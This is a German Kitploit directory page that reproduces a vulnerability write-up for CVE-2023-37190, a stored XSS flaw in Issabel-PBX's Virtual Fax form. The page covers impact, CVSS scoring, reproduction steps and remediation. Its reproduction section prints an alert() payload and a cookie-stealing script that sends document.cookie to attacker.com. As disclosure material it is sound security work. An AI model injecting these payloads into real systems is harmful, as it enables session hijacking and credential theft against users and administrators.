Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-37190 — Eine Stored Cross-Site Scripting (XSS)-Schwachstelle existiert in Issabel-PBX Version 4.0.0-6. Die Anwendung versäumt es, benutzereingegebene Eingaben ordnungsgemäß zu bereinigen und zu kodieren, bevor sie in der Datenbank gespeichert und anschließend in der Weboberfläche dargestellt werden. | Kitploit
Tools/GitHubGitHub/sahiloj/cve-2023-37190
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPapers & ForschungLernen & Bildung
GitHubsahiloj/cve-2023-37190

CVE-2023-37190

Repository anzeigen
112vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Eine Stored Cross-Site Scripting (XSS)-Schwachstelle existiert in Issabel-PBX Version 4.0.0-6. Die Anwendung versäumt es, benutzereingegebene Eingaben ordnungsgemäß zu bereinigen und zu kodieren, bevor sie in der Datenbank gespeichert und anschließend in der Weboberfläche dargestellt werden.

Teilen

CVE-2023-37190 — Issabel-PBX 4.0.0-6: Stored Cross-Site Scripting (XSS)

CVE Severity Type Affected Version


📋 Übersicht

FeldDetails
CVE-IDCVE-2023-37190
SchwachstelleStored Cross-Site Scripting (XSS)
Betroffenes ProduktIssabel-PBX
Betroffene Version4.0.0-6
SchweregradMittel (CVSS v3.1 Wert: 5.4)
Entdeckt vonSahil Ojha
Offenlegungsdatum07. Juli 2023
AnbieterIssabel
QuellcodeIssabelFoundation/issabelPBX
Getestet aufWindows

📝 Beschreibung

Eine Stored Cross-Site Scripting (XSS)-Schwachstelle existiert in Issabel-PBX Version 4.0.0-6. Die Anwendung bereinigt und kodiert benutzereingegebene Daten nicht ordnungsgemäß, bevor sie in der Datenbank gespeichert und anschließend in der Weboberfläche dargestellt werden.

Die Schwachstelle befindet sich im Virtual Fax-Modul, genauer gesagt im „New Virtual Fax“-Erstellungsformular. Zwei Eingabeparameter – Virtual Fax Name und Caller ID Name – unterliegen keiner ausreichenden Eingabevalidierung oder Ausgabekodierung. Dadurch kann ein niedrig privilegierter authentifizierter Angreifer eine bösartige JavaScript-Nutzlast injizieren und dauerhaft in der Anwendung speichern.

Nach dem Speichern wird das bösartige Skript automatisch im Browser jedes Benutzers (einschließlich Administratoren) ausgeführt, der die betroffene Seite besucht, ohne dass der Angreifer weitere Interaktion benötigt.


⚠️ Auswirkungen

Ein Angreifer, der diese Schwachstelle erfolgreich ausnutzt, kann:

  • Sitzungscookies stehlen und authentifizierte Benutzersitzungen kapern, einschließlich Administratorkonten.
  • Aktionen im Namen der Opfer durchführen, wie z. B. Konfigurationen ändern, Benutzer hinzufügen oder Systemeinstellungen ändern.
  • Benutzer auf vom Angreifer kontrollierte Phishing- oder Malware-Verteilungsseiten umleiten.
  • Die Anwendungsoberfläche verunstalten, was die Benutzererfahrung und das Vertrauen beeinträchtigt.
  • Malware oder Browser-Exploits an alle Benutzer liefern, die die betroffene Seite besuchen.
  • Keylogging durchführen oder vertrauliche Informationen erfassen, die auf der Seite eingegeben werden.

Da die Nutzlast gespeichert (persistent) ist, betrifft sie jeden Benutzer, der die anfällige Seite besucht, bis sie entfernt wird – was diese Schwachstelle schwerwiegender macht als eine reflektierte XSS.


🔢 CVSS v3.1 Wert

MetrikWert
Basiswert5,4 (Mittel)
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche RechteNiedrig
BenutzerinteraktionErforderlich
UmfangGeändert
VertraulichkeitNiedrig
IntegritätNiedrig
VerfügbarkeitKeine

🔍 Schwachstellendetails

  • Schwachstellentyp: Stored Cross-Site Scripting (CWE-79)
  • Betroffene Komponente: Virtual Fax-Modul → New Virtual Fax-Formular
  • Anfällige Parameter:
    • Virtual Fax Name
    • Caller ID Name
  • Erforderliche Authentifizierung: Ja (niedrig privilegierter authentifizierter Benutzer)
  • Ursache: Fehlende Eingabebereinigung und Ausgabekodierung der betroffenen Parameter vor dem Speichern in der Datenbank und der Darstellung in der Weboberfläche.

🛠️ Schritte zur Reproduktion

Voraussetzungen

  • Eine laufende Instanz von Issabel-PBX Version 4.0.0-6.
  • Gültige Anmeldedaten für ein Konto mit Zugriff auf das Fax-Modul (Standardbenutzer oder Administrator).

Reproduktionsschritte

Schritt 1: Melden Sie sich mit gültigen Anmeldedaten in der Issabel-PBX-Webanwendung an.

Schritt 2: Navigieren Sie zu Fax → Virtual Fax → New Virtual Fax.

Injectieren Sie die folgende XSS-Nutzlast in die Felder Virtual Fax Name und/oder Caller ID Name:

root@kitploit:~
<script>alert('XSS-CVE-2023-37190')</script>

Für einen wirkungsvolleren Proof-of-Concept, der den Diebstahl von Sitzungscookies demonstriert (Hinweis: In echten Angriffen wird HTTPS verwendet, um gestohlene Cookies nicht während der Übertragung offenzulegen):

root@kitploit:~
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

Das ausgefüllte Formular mit der injizierten Nutzlast sollte ähnlich wie im folgenden Screenshot aussehen:

Schritt 2 - Injizieren der XSS-Nutzlast in die Felder Virtual Fax Name und Caller ID Name

Schritt 3: Klicken Sie auf die Schaltfläche Save, um das Formular abzusenden. Die Nutzlast wird nun dauerhaft in der Anwendungsdatenbank gespeichert.

Schritt 4: Navigieren Sie zur Liste der virtuellen Faxe (oder lassen Sie einen anderen Benutzer – z. B. einen Administrator – die Seite besuchen). Das gespeicherte Skript wird automatisch im Browser des Besuchers ausgeführt, wie unten gezeigt:

Schritt 4 - Ausführung der gespeicherten XSS-Nutzlast im Browser


🩹 Abhilfe & Behebung

Benutzern und Administratoren von Issabel-PBX wird dringend empfohlen, die folgenden Maßnahmen zu ergreifen:

  1. Eingabevalidierung: Führen Sie eine strenge serverseitige Validierung aller benutzereingegebenen Daten durch. Lehnen Sie Eingaben ab oder bereinigen Sie sie, die HTML-Sonderzeichen (<, >, ", ', &) enthalten.
  2. Ausgabekodierung: Wenden Sie eine kontextbewusste Ausgabekodierung (HTML-Entity-Kodierung) an, wenn benutzereingegebene Daten in der Weboberfläche dargestellt werden, um die Ausführung von Skripten zu verhindern.
  3. Content Security Policy (CSP): Implementieren Sie einen strengen Content-Security-Policy-HTTP-Header, um die Quellen einzuschränken, von denen Skripte ausgeführt werden können, und so die Auswirkungen von XSS-Schwachstellen zu verringern.
  4. Upgrade/Patch: Überwachen Sie das offizielle Issabel-Repository und wenden Sie alle vom Anbieter veröffentlichten Sicherheitspatches an.
  5. Minimales Privileg: Beschränken Sie den Zugriff auf sensible Module wie Virtual Fax nur auf diejenigen Benutzer, die ihn benötigen, um die Angriffsfläche zu verringern.

📚 Referenzen

  • NVD - CVE-2023-37190
  • MITRE CVE-Eintrag
  • Issabel Offizielle Website
  • IssabelFoundation/issabelPBX auf GitHub
  • CWE-79: Unzureichende Neutralisierung von Eingaben bei der Generierung von Webseiten ('Cross-site Scripting')
  • OWASP: Cross-Site Scripting (XSS)

👤 Autor

Sahil Ojha
Sicherheitsforscher
GitHub: @sahiloj


Haftungsausschluss: Dieses Repository dient ausschließlich Bildungs- und verantwortungsvollen Offenlegungszwecken. Die hier bereitgestellten Informationen sollten nicht verwendet werden, um Systeme ohne ausdrückliche schriftliche Genehmigung des Systembesitzers anzugreifen. Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieser Informationen.

Tool herunterladen